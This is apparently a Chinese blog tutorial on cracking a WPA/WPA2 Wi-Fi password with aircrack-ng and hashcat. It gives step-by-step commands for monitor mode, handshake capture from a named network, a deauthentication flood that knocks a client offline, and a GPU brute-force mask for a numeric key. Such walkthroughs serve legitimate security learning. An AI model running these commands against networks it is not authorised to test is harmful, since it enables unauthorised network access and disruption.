- 1ZooKeeper
- 2python流程控制_python users.copy().items():
- 3DM_SQL
- 4如何查看电脑上是否安装有IIS服务
- 5Linux | gcc和g++的区别_linux中gcc和g++区别
- 6在Linux操作系统中摄像头的驱动方法_linux chrome驱动不识别摄像头
- 7ERR! Error: CERT_UNTRUSTED_982 error error: cert_untrusted
- 8从实践中学习Kali Linux渗透测试_kali渗透测试
- 9【程序语言】-- 编程语言分类和应用_编程语言的区别和应用领域
- 10微软苏菲rt能装鸿蒙,忘记RT,让微软还你一个不一样的“苏菲3”
Kali Aircrack-NG HashCat 破解Wi-Fi密码_kali hashcat
赞
踩
Kali Aircrack-NG HashCat 破解Wi-Fi密码
假日无事,某网站购入TL-WN722N Kali免驱网卡,扫描一下附近网络试试
仅学习使用
1.设备概要
- TL-WN722N Kali免驱网卡
- MacBook Pro (Parallels Desktop)
- Kali镜像 https://www.kali.org/get-kali/
- 个人博客: https://blog.ztfot.com/?p=290
2.破解WPA/WPA2类WI-FI操作(Root下操作):
用Parallels Desktop 安装Kali Linux,并且接入无线网卡
2.1查看可用无线网卡
airmon-ng
- 1
2.2启用网卡监听模式
airmon-ng start wlan0
- 1
使用iwconfig确认已经开启网卡监听模式,主要表现是,网卡名称wlan0变为wlan0mon, Mode:Monitor
2.3扫描周围Wi-Fi
airodump-ng wlan0mon
- 1
BSSID -- Wi-Fi的Mac地址 PWR -- 信号强度 Data -- 监听期间流量总和 CH -- WI-FI所用信道 ENC -- 加密算法 ESSID -- Wi-Fi名称
- 看到需要破解的WI-FI按下Ctrl +C 终止
我们的目标名是ChinaNet-zLApBSSID : 8C:53:C3:DA:77:F7 CH : 6
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EGjssNUT-1652855895563)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a16223c7-251a-4e00-9911-e0ff3d6cb24b/Untitled.png)]](https://img-blog.csdnimg.cn/61b273b5774b477aa725ded3640a740f.png)
2.4抓取握手包并保存为CAP文件
airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon
# -bssid 指定要破解的WI-FI BSSID 值
# -c 指定要破解的Wi-Fi的信道
# -w 捕获到的握手包文件名
- 1
- 2
- 3
- 4
2.5 主动对设备断网获取握手包
上一步中我们是被动等待
(以前我没有kali linux以及网卡的时候,MacBook就一直挂着等待很久很久~~)
但对于上面已经连上Wi-Fi的设备,我们可以使用aireplay-ng 进行deauth洪水攻击使其设备掉线,掉线的设备会自动重新连上Wi-Fi,此时我们就可以获得握手包
保持上步抓包命令不中断,新开一个窗口执行(我们选取信号最好的 PWR = -12 ):
aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon
# -0 表示断开设备连接
# 10 表示deauth攻击次数
# -a 为Wi-Fi的BSSID
# -c 表示让连接设备失效的设备BSSID地址,为上图中STATION地址
- 1
- 2
- 3
- 4
- 5
上图为洪水攻击过程(攻击过程十分明显,因为我连网的智能台灯熄灭重启了)
如图所示,我们已经抓到了重新认证的 28:6C:07:29:D9:A2 的握手包,使用Ctrl +C终止抓包
此时会在指定目录下产生文件(每次抓包后会产生一组,留意数字为第几次执行的)
3.暴力破解CAP文件
字典配合Aircrack-ng效率有点低(CPU破解),所以我们使用HashCat(GPU)破解WPA/WPA2的握手包
由于HashCat无法直接破解CAP文件,所以我们得将其转化为HCCAPX文件
去官网转换,https://hashcat.net/cap2hccapx/ 如图
或者使用工具(hashcat-utils的cap2hccapx):
下载地址:https://github.com/hashcat/hashcat-utils/releases/
cd hashcat-utils-1.9/bin && chmod +x cap2hccapx.bin
- 1
将CAP文件转化为HCCAPX文件:
- 因为抓包了好几次,所以这里出现3个,只要有其中的一个就可以了,如果没有,那就是抓包失败了
3.1使用HashCat破解
- 找了一台有独显的笔记本,MacBook核显计算??..
hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d"
# -a attack_mode [ 0 Straight(字典破解) 1 Combination(组合破解) 3 Brute-force(掩码暴力破解)]
# -m 2500 破解WPA2 hccapx文件
#'?d' 一个'?d'表示一个数字,我这里是10位数数字密码,常用掩码类型如下:
# ? | Charset
# ===+=========
# l | abcdefghijklmnopqrstuvwxyz
# u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
# d | 0123456789
# h | 0123456789abcdef
# H | 0123456789ABCDEF
# s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
# a | ?l?u?d?s
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
按下**’s’**了解最新破解信息(Wi-Fi是10位数数字密码,GTX 850M 最久需要两天。。)
过了很久,密码破解成功,如图:
